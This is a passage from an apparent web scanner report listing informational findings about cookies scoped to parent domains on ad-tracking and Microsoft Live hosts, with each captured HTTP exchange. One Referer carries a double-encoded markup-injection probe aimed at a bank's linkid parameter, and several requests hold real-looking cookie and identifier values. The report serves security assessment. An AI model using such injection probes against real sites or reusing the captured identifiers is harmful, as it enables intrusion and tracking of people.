byTrWf2YHPC+gtG5v47ACfXxqa+PKSwt+qsEkPgkNURTzR0KCYzlr4x+peGKk6RmsG77sXdTBUibj80e3RZr4t9u8pKS3Fn2/GKAU+NeESlKeobr3vVdvGtsrFjFYli70T2ziFKby+Qxj+/VaVk1Cwdv/z+74da0Qq+8prsMJDaJgyuPe++Hj6JIScVHCQst2JCiwMtWbAJcj/zS9WFNV9bhv8tYlXH3Jl5HC0DkxGep5F2sFJASnSfG7ZR9cFXpzvL/KpuP/gaXEKUj91dUkakgwd2x8Hiog4fvX5nm/MQdjmxA9ZHHm98vUJoP8K1yRT6suKbcGSGDda6zKw2yIkw4htuXGZQGsb+RgZtuT387+5Fwsr+n1QaZHo2Sfpkt9JxY0Hy+cIkFoZxVOG7oOgjrvxy0UQ68MEz1bWMamHtqnLw/NzVRcPy0XGAx1Rr0AAFcusd6Q5wZv1Ry9Psm1Wf0FNRBTXa5Yoq6Be4QmCNbw0wXye73utdc+KcD/v4Gc=; Domain=.revsci.net; Expires=Sun, 22-Jul-2012 13:19:14 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 23 Jul 2011 13:19:14 GMT
Content-Length: 1180

/* AG-develop 12.7.1-48 (2011-07-13 07:11:32 UTC) */
rsinetsegs=['D08734_72078','J08778_10040','J08778_10039','D08734_70076','D08734_70056','D08734_70065','D08734_70033','J08778_10078','D08734_72011',
...[SNIP]...

10.137. http://pixel.33across.com/ps/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.33across.com
Path:	/ps/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

33x_ps=u%3D8586643645%3As1%3D1311254754690%3Ats%3D1311254754690; Domain=.33across.com; Expires=Sun, 22-Jul-2012 13:15:19 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ps/?pid=454&uid=4e282ba90cea006f HTTP/1.1
Host: pixel.33across.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh46.html
Cookie: 33x_ps=u%3D8586643645%3As1%3D1311254754690%3Ats%3D1311254754690

Response

HTTP/1.1 302 Moved Temporarily
Date: Sat, 23 Jul 2011 13:15:19 GMT
P3P: CP="NOI DSP COR NID PSA PSD OUR IND UNI COM NAV INT DEM STA"
Set-Cookie: 33x_ps=u%3D8586643645%3As1%3D1311254754690%3Ats%3D1311254754690; Domain=.33across.com; Expires=Sun, 22-Jul-2012 13:15:19 GMT; Path=/
Location: http://ib.adnxs.com/mapuid?t=2&member=1001&user=8586643645&seg_code=33x&random=280753
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8

10.138. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EL4BCgGlB5GX; expires=Fri, 21-Oct-2011 04:48:53 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=1129440424;fpan=1;fpa=P0-1080863387-1311396539021;ns=0;url=http%3A%2F%2Fwow.curse.com%2Fdownloads%2Fwow-addons%2Fdetails%2Frawr-official.aspx;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x24;enc=n;ogl=;dst=1;et=1311396539019;tzo=300;a=p-d2K9aGgyU-tIA HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: mc=4e2828c8-d9531-5088b-1dbd4; d=ELQBBgGlBw

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ib.adnxs.com/getuid?http://cms.quantserve.com/dpixel?eid=5&id=$UID
Set-Cookie: d=EL4BCgGlB5GX; expires=Fri, 21-Oct-2011 04:48:53 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Sat, 23 Jul 2011 04:48:53 GMT
Server: QS

10.139. http://pixel.quantserve.com/pixel/p-c9d_b-0iR8pjg.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-c9d_b-0iR8pjg.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=ELQBBgGlBw; expires=Fri, 21-Oct-2011 04:48:32 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-c9d_b-0iR8pjg.gif HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://wow.curse.com/downloads/wow-addons/details/rawr-official.aspx
Cookie: mc=4e2828c8-d9531-5088b-1dbd4; d=ELUBBgGkBw

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=ELQBBgGlBw; expires=Fri, 21-Oct-2011 04:48:32 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sat, 23 Jul 2011 04:48:32 GMT
Server: QS

GIF89a.......,.................D..;

10.140. http://profile.live.com/Handlers/Plt.mvc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profile.live.com
Path:	/Handlers/Plt.mvc

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

E=P:4emT2gkXzog=:MdiAwhSnfYG9oPh2YvoGnnzgIswPL0Nr9Cpbh9ITQtQ=:F; domain=.live.com; path=/
E=P:4emT2gkXzog=:MdiAwhSnfYG9oPh2YvoGnnzgIswPL0Nr9Cpbh9ITQtQ=:F; domain=.live.com; path=/
wla42=YnkyfHByb3h5LWJheS5wdnQtY29udGFjdHMubXNuLmNvbSoxLDlDOTgzOEU4RTk1OEVGRkUsMCwsMHwxLDY5RjQwMDJDN0I3OTUzQSwwLDEsMHwxLERENjQ5RUFGM0M1NDIyMTcsLCwwfDEsNTEwQTk3NEVDQjk0RkIzMCwwLDEsMA==; domain=live.com; expires=Sat, 30-Jul-2011 04:40:59 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Handlers/Plt.mvc?bicild=&v=16.0.1713 HTTP/1.1
Host: profile.live.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://profile.live.com/cid-9c9838e8e958effe/
Cookie: mkt0=en-US; drua=9c9838e8e958effe-1; wlidperf=throughput=5&latency=546; sc_identity_142=MDgyNTY2MDhkNGIxYWNkODI6Qmd1TXpwcSt0SHlFU3VRRi8yREs2eTRIeDQ3QUNXNHBldHNqV04zU0FOdmdNMVFjcWgvd2w0K1R0TThPYnl3alo1TjU1TVkrUlByNGdYazBKTTA4QXVnNEpPNlpsNldZV1dyMnlubmwxcGc9; sc_clustbl_142=566f871c788f48c92:EHxWb0P2tdplBLXXJ8k16Hm6IxC57bMEFfNz/1kRNP+zvaKl/kwnDO6C+OmPqNfzzHbsfdlkbwwv8Pj+pHFvdXnKPkQiDArPC1NDPPg7b787mw+J9Kcp135Aj4sMWpSE/hMXM6YiPo+cHhLQIqABGz2XNn7WWwctsBXj/9yVgewQ6dO5bByChCXM9dkJuUF2FYCFea0uEBgSEPklPwXnDg+QJx7jIHMdXxN12yWx02rIXobTWvHWo+IJbvfO+FWQ; wla42=YnkyfHByb3h5LWJheS5wdnQtY29udGFjdHMubXNuLmNvbSoxLDlDOTgzOEU4RTk1OEVGRkUsMCwsMHwxLDUxMEE5NzRFQ0I5NEZCMzAsMCwxLDB8MSw2OUY0MDAyQzdCNzk1M0EsMCwxLDB8MSxERDY0OUVBRjNDNTQyMjE3LCwsMA==; E=P:nfgm1AkXzog=:2jcn3G4MS+FrpMyDTnadRXcrIv8hrFN/hTw6mIw1bLs=:F; xid=5aa0c1fb-caa3-40df-b5b6-4e2e6656cc32&&SN2xxxxxC516&247; xidseq=4; sc_lpscache_142=1puLZpFXfhxkqa0QGDFxva1raK59T4XxDKhJQPHxcHQw8QDaPSec1x0A; wlv=A|_-d:s*UM6wBg.2+1+0+3; BP=l=SN.Profile&FR=&ST=; LD=5aa0c1fb-caa3-40df-b5b6-4e2e6656cc32_0044657a12f_13263_1311396056071=L3146; MUID=1A89D03C0A4769473AE9D2040E476929&TUID=1

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=31536000
Content-Type: image/gif
Expires: Sun, 22 Jul 2012 04:40:59 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Imf: dc9dadff-a217-4906-bd52-a3be7c9f1714
Set-Cookie: E=P:4emT2gkXzog=:MdiAwhSnfYG9oPh2YvoGnnzgIswPL0Nr9Cpbh9ITQtQ=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: E=P:4emT2gkXzog=:MdiAwhSnfYG9oPh2YvoGnnzgIswPL0Nr9Cpbh9ITQtQ=:F; domain=.live.com; path=/
Set-Cookie: xidseq=6; domain=.live.com; path=/
Set-Cookie: pltmode=1; domain=.live.com; expires=Sat, 23-Jul-2011 04:41:09 GMT; path=/
Set-Cookie: wla42=YnkyfHByb3h5LWJheS5wdnQtY29udGFjdHMubXNuLmNvbSoxLDlDOTgzOEU4RTk1OEVGRkUsMCwsMHwxLDY5RjQwMDJDN0I3OTUzQSwwLDEsMHwxLERENjQ5RUFGM0M1NDIyMTcsLCwwfDEsNTEwQTk3NEVDQjk0RkIzMCwwLDEsMA==; domain=live.com; expires=Sat, 30-Jul-2011 04:40:59 GMT; path=/
Set-Cookie: sc_clustbl_142=92a870897beb4f392:0BqMqpdQLzbScLmNWQ5mybVkdxyrMVtO42vl9vl/Ct/lcNMgWb1RxFc34k6aqemFO5XdZvocPaeasXDtJXni/bkFMMFfrnbEqh4WaQ1z+HR0b6se+JVH20s+KYMw2uG9zrH4VqVChyC8uVa5g51RKtfoC4js9zFORGwxMQs1GgWIStnQsG1dUIjmKA75uVqS+3dmdMwKcmTAqbv4+eum30US//xfR1TQSc0cl18ma5V+CgYlCi4cEGM9ct5rN+A7; domain=profile.live.com; expires=Mon, 22-Aug-2011 04:40:59 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: SN2XXXXXC549 V: 1 D: 7/13/2011
Date: Sat, 23 Jul 2011 04:40:58 GMT
Content-Length: 42

GIF89a.............!.......,...........2.;

10.141. http://profile.live.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://profile.live.com
Path:	/favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

E=P:DjJOywkXzog=:taOFGKM6+whNpm7iJtsKuAtlWGYUCOLabQGXgUsgiBs=:F; domain=.live.com; path=/
E=P:DjJOywkXzog=:taOFGKM6+whNpm7iJtsKuAtlWGYUCOLabQGXgUsgiBs=:F; domain=.live.com; path=/
wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJsdTIqMSwzMzMyQ0EzQkE2RkRGMTgxLDEsMCwwfDEsOTZCQTAzODYyRTEzMDYxMCwsMCww; domain=live.com; expires=Sat, 30-Jul-2011 04:40:33 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
Host: profile.live.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: mkt0=en-US; drua=9c9838e8e958effe-1; wlidperf=throughput=8&latency=367; sc_identity_142=YzAzZWI2MjliODlkMjUwZDI6ZWVEK09HRmNzcVh1cXdWOU1TL2FwMG1UcTFIUWMydEdkZDUwbjhnd2tiNzJhVGdBZE50UUNEdWVWV2sxcVRwOVB0bEc4ZzBYZ2dacUlIQTBQSERhaldQWnBrNDA1K3BpNFllUjVYTGpFdTg9; sc_clustbl_142=93ffea97bf97b15b2:L/mLaC1VICv5+xNj6FNpJfdmJ+7P9enQ+0uAFSVGzpVe9FtETzsBK2Ogk9fbw0qTmhTPZls7vktow3Xth6SjlIgW1iAxLKK2Nonqm8a/40Zmu0VH7Bw5CHIiWaXFfKjguZKOp4vPZlr/0Jre0qx7Hg==; wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJsdTIqMSwzMzMyQ0EzQkE2RkRGMTgxLDEsMCwwfDEsOTZCQTAzODYyRTEzMDYxMCwsMCww; E=P:4icOyQkXzog=:9eWTn9//Ft4dFkPglCCPk++L/714RmsnFFHYqEfnRGY=:F; xid=5aa0c1fb-caa3-40df-b5b6-4e2e6656cc32&&SN2xxxxxC516&247; xidseq=1; sc_lpscache_142=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Imf: d00b3585-a50c-4153-8778-76572bf8b027
Set-Cookie: E=P:DjJOywkXzog=:taOFGKM6+whNpm7iJtsKuAtlWGYUCOLabQGXgUsgiBs=:F; domain=.live.com; path=/
X-AspNet-Version: 4.0.30319
Set-Cookie: E=P:DjJOywkXzog=:taOFGKM6+whNpm7iJtsKuAtlWGYUCOLabQGXgUsgiBs=:F; domain=.live.com; path=/
Set-Cookie: xidseq=3; domain=.live.com; path=/
Set-Cookie: LD=; domain=.live.com; expires=Sat, 23-Jul-2011 03:00:33 GMT; path=/
Set-Cookie: wla42=cHJveHktYmF5LnB2dC1jb250YWN0cy5tc24uY29tfGJsdTIqMSwzMzMyQ0EzQkE2RkRGMTgxLDEsMCwwfDEsOTZCQTAzODYyRTEzMDYxMCwsMCww; domain=live.com; expires=Sat, 30-Jul-2011 04:40:33 GMT; path=/
Set-Cookie: sc_clustbl_142=31c6af2918da19922:rCpxKiBzFsqs794QovcnBwsuDd+NlvJQAjZo6kS6CpvjnkWnhuLA2BhjI+c9A3VIt11DVZAThYZ+v7HUsz0GK3T6wYFfFcLwASbdhl53Z1oH/oyEeS1OykLmNPWhyQZpBZcTfLUqrGUhziYchwegvw==; domain=profile.live.com; expires=Mon, 22-Aug-2011 04:40:33 GMT; path=/
X-Powered-By: ASP.NET
X-Content-Type-Options: nosniff
X-MSNSERVER: H: SN2XXXXXC565 V: 1 D: 7/13/2011
Date: Sat, 23 Jul 2011 04:40:33 GMT
Content-Length: 3531

<html>
<head>
<noscript><meta http-equiv="refresh" content="2;url=https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1311396033&rver=6.1.620
...[SNIP]...

10.142. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; expires=Sun, 21-Jul-2013 20:31:12 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=9af5e269-ffc3-60ee-513f-0d7cb918982a&rtb=csmq4atf04cxa HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://www.capitalone.com/directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_Z_Z_Z__C2_01_T_SP1ca646%252522%25253E%25253Ca%25253E91c2cd96a28
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; p=1310393775

Response

HTTP/1.1 200 OK
Date: Fri, 22 Jul 2011 20:31:12 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; expires=Sun, 21-Jul-2013 20:31:12 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

10.143. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/772053252 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/du/id/L21rdC8xL21jaHBpZC8y/rnd/772053252

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=4146544210108361256; Domain=.turn.com; Expires=Thu, 19-Jan-2012 04:49:14 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC8y/rnd/772053252 HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lijit.com/beacon?viewId=1311396557609b4824cb807cd&rand=1311396557610&uri=http://www.lijit.com/users/curse&informer=7713456&type=fpads&loc=http%3A%2F%2Fwww.curse.com%2F&rr=http%3A//c627028.r28.cf2.rackcdn.com/google29reddefaultsUSA728x90.html&ifr=1&v=1.0&csync=1
Cookie: uid=4146544210108361256; pf=lEChpcdIVNDkDNROcq3snc28Y8g8RhxzqrAWNXGR_PyyrpLutjrg3FTJXr1E8PV6g9kHt_PH15WDdNS-zB8QXOQ3VIbt3jP8kLyX9mRH728svfrUG4Yma_YPhaslMZdITOKfOsMnvbgakCOP3yO8wg8tlM3UBKnVqGzVZjq5HNJv_drOifvAQipkEpr82UhJ63vghD1IWWtC1NYjUoqA0fR_VLQ60Y4o8x5YwvLJpP509oJ4f6kfDwfpRi96RGsSXTmvGPd2-A8bAsVXnz-vBG0CMUA3CG7Q62EHfmNT7q_ig7cUXlLlbRIGRjI81HwNR7H9BpK2Ru2H8ZJGWBlO80sZ4sASoHmP3khf-YwcUezwJuNPnTM2vwaRjQm5ghUV9oiM23c4cpSzOByapoFzhtO9BhGI2vFybm8ioFouHJHsB5_fgLKMfud8hyO2V4t8AIm07dCHbnjlnY8GpVNBq6SnZbZ2sSzwrd9uXFf6xbg; rrs=3%7C6%7C9%7C12%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C2%7C5%7C1001%7C1004; rds=15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15176%7C15177%7C15177%7C15177%7C15177; rv=1; adImpCount=a_Fl-jM8u64iw0tByuG83r_dYtKCJgKA9-oYi1Nm4qJd6ISB_q_vS5rapRhLZ6kjjNSG7QiuJA-qLtNNeRtIwcahYIC-AVRz7zobC5Rtd5jJ9bi87X6i6ORPTInr3REGW-m7iHWT3G3HUToA1t7oH38rap5GcU7rLo_gLaoUaQk; fc=vtaC60j7i7LhR-Fxj3hSCoZ7o1uioH7AdRgRDSd8iXv_50KaXBO7AlgWu3mK4AXz3YWM9WtTynt3EyJPItdwveHcJu6EmAhSShLnI5cmEY9O290pGL9llaAeujQeBAhd

Response

10.144. http://r.turn.com/r/du/id/L21rdC8xL21jaHBpZC8z/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/du/id/L21rdC8xL21jaHBpZC8z/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uid=4146544210108361256; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:42:53 GMT; Path=/
rrs=3%7C6%7C9%7C12%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C2%7C5%7C1001%7C1004; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:42:53 GMT; Path=/
rds=15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15176%7C15177%7C15177%7C15177%7C15177; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:42:53 GMT; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/du/id/L21rdC8xL21jaHBpZC8z/ HTTP/1.1
Host: r.turn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25659&s=26922
Cookie: uid=4146544210108361256; pf=nZySyOPeh2ug-66f3S_YJ-08eNO3kJ_g1J0ui0giN0IO9arxyxx0God0z89jjC5u7B_Md7IXVjaLRc76_SNpoZsbEDch1o94tTK7X4mzUCMC35RnwUiMoGkJYCinoxtJgfaE0IC8cyLwhG_8rfNFZKo408BxR9uazB8jKSDnLvk; rrs=1%7C2%7C3%7C4%7C5%7C6%7C7%7Cundefined%7C9%7C1001%7C1002%7C1003%7C10%7C1004%7Cundefined%7C12%7Cundefined%7Cundefined%7C1008%7C13%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C18; rds=15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7Cundefined%7C15177%7Cundefined%7Cundefined%7C15177%7C15177%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7Cundefined%7C15177; rv=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4146544210108361256; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:42:53 GMT; Path=/
Set-Cookie: rrs=3%7C6%7C9%7C12%7C1002%7C18%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C2%7C5%7C1001%7C1004; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:42:53 GMT; Path=/
Set-Cookie: rds=15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15177%7C15176%7C15177%7C15177%7C15177%7C15177; Domain=.turn.com; Expires=Tue, 17-Jan-2012 18:42:53 GMT; Path=/
Location: http://d.audienceiq.com/r/dm/mkt/73/mpid//mpuid/4146544210108361256/mchpid/3/url/
Content-Length: 0
Date: Thu, 21 Jul 2011 18:42:53 GMT

10.145. http://rd.apmebf.com/w/get.media previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rd.apmebf.com
Path:	/w/get.media

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

S=fks3qs-19425-1311273790527-6v; domain=.apmebf.com; path=/; expires=Sat, 20-Jul-2013 18:43:10 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /w/get.media?sid=38735&m=1&tp=5&d=j&t=n&host=media.fastclick.net HTTP/1.1
Host: rd.apmebf.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool

Response

HTTP/1.1 302 Found
Date: Thu, 21 Jul 2011 18:43:10 GMT
Server: Apache/2.2.4 (Unix)
Set-Cookie: S=fks3qs-19425-1311273790527-6v; domain=.apmebf.com; path=/; expires=Sat, 20-Jul-2013 18:43:10 GMT
Location: http://media.fastclick.net/w/get.media?sid=38735&m=1&tp=5&d=j&t=n&no_cj_c=0&upsid=571814024282
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Content-Length: 302
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://media.fastclick.net/w/get.media?sid=3873
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://rmedia.boston.com
Path:	/RealMedia/ads/adstream_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

RMFD=011QkcXHO2060Og; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.boston.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /RealMedia/ads/adstream_lx.ads/www.boston.com/lifestyle/default/L32/1921254557/RIGHT1/boston/m_smiletrain070611_ros_SKY/160x600_rosx_071211-smiletrain.html/72634857383034474942344141544233?_RM_EMPTY_&keywords=Social%20Networking%20(Internet)&globesection=a1&pagetype=article_page&articletype=globe_story&RM_Exclude=exclude_article_page&s_campaign=0000 HTTP/1.1
Host: rmedia.boston.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW804GIB4AATB3; s_vi=[CS]v1|2703101A8516139C-400001A3C00CA954[CE]; anonId=c78dd2a2-2fd6-478d-a9a0-c99ad34539e3; mbox=check#true#1311428842|session#1311428781592-195064#1311430642|level#10#1321796782|traffic#true#1321796782|PC#1311428781592-195064.17#1312638385; __unam=b6206f2-130c7ed914a-12883c53-5; bcpage=6

Response

HTTP/1.1 200 OK
Date: Sat, 23 Jul 2011 13:48:28 GMT
Server: Apache
Set-Cookie: RMFD=011QkcXHO2060Og; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.boston.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Expires: Tue, 25 Apr 1995 09:30:27 -0700
